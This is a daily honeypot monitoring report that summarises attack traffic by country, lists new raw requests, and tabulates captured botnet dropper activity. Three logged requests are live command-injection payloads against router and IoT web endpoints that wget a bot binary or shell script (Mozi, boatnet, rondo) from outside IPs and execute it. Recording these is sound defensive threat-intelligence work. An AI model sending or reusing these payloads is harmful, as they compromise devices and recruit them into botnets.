Daily Report: 2025-06-24#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 14 new requests that have never been observed before (these were added to the monitored request database.).
A total of 700 requests were recorded during the day, originating from 3 different countries, with a peak of 289 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
144.172.97.104 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.32%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
122.97.212.38 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://102.33.47.108:41507/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
82 | 1 | \x00\x0E8x\x13\x0F\xBF\xEF\xD1X~\x00\x00\x00\x00\x00 |
90 | 1 | GET /cgi-bin/sms_send?username=user1&password=user1&number=003584573994612&text=test HTTP/1.1 |
99 | 1 | GET /cgi-bin/sms_send?username=user1&password=user_pass&number=003584573994612&text=test HTTP/1.1 |
100 | 1 | GET /cgi-bin/sms_send?username=user1&password=p8xr6tINNA0eGBIY&number=003584573994612&text=test HTTP/1.1 |
169 | 1 | \x00\x0E82\x9E4F\x89\x80n\xB7\x00\x00\x00\x00\x00 |
182 | 1 | \x00\x0E8\x87qJ\xD2\xCD\xDF\xE66\x00\x00\x00\x00\x00 |
183 | 1 | \x00\x0E\x08\x87qJ\xD2\xCD\xDF\xE66\x00\x00\x00\x00\x00 |
184 | 1 | \x05d\x05\xC9\x00\x00\x00\x006L\x05d\x05\xC9\x01\x00\x00\x00\xDE\x8E\x05d\x05\xC9\x02\x00\x00\x00\x9F\x84\x05d\x05\xC9\x03\x00\x00\x00wF\x05d\x05\xC9\x04\x00\x00\x00\x1D\x90\x05d\x05\xC9\x05\x00\x00\x00\xF5R\x05d\x05\xC9\x06\x00\x00\x00\xB4X\x05d\x05\xC9\x07\x00\x00\x00\x5C\x9A\x05d\x05\xC9\x08\x00\x00\x00\x19\xB9\x05d\x05\xC9\x09\x00\x00\x00\xF1{\x05d\x05\xC9 |
194 | 1 | \x00\x0E8\xB4\xB4\xBB\xA0\xFC\xB11l\x00\x00\x00\x00\x00 |
209 | 1 | \x00\x0E\x08M\x1D\xA0fG\xC5\xEF\xAF\x00\x00\x00\x00\x00 |
210 | 1 | \x00\x0E8M\x1D\xA0fG\xC5\xEF\xAF\x00\x00\x00\x00\x00 |
211 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/d\x8A\xF7\x7F\x00\x00\x00\xFA\x1D\xED\x1C\x00\x00\x00\xE0\x81\x89\x8A\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
217 | 1 | \x00\x0E8\xD3L\xD6\xD9\xBBE\x9A\xEB\x00\x00\x00\x00\x00 |
222 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\x9F\x83\xF7\x7F\x00\x00\x10\xF5=\x82`\x00\x00\x00\xE0\x81\xC4\x83\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 289 | US |
1 | 64 | CN |
2 | 46 | BG |
3 | 45 | DE |
4 | 45 | NL |
5 | 24 | JP |
6 | 21 | IN |
7 | 18 | CA |
8 | 18 | SG |
9 | 18 | GB |
10 | 16 | ID |
11 | 9 | LT |
12 | 7 | RU |
13 | 7 | BR |
14 | 6 | PL |
15 | 6 | CH |
16 | 6 | ZA |
17 | 6 | IL |
18 | 6 | PT |
19 | 5 | SC |
20 | 4 | BE |
21 | 4 | AO |
22 | 4 | UA |
23 | 3 | FR |
24 | 3 | KZ |
25 | 3 | AU |
26 | 2 | MD |
27 | 2 | KR |
28 | 2 | HK |
29 | 2 | KW |
30 | 2 | SE |
31 | 2 | IE |
32 | 1 | MC |
33 | 1 | ES |
34 | 1 | KH |
35 | 1 | VE |
36 | 1 | AZ |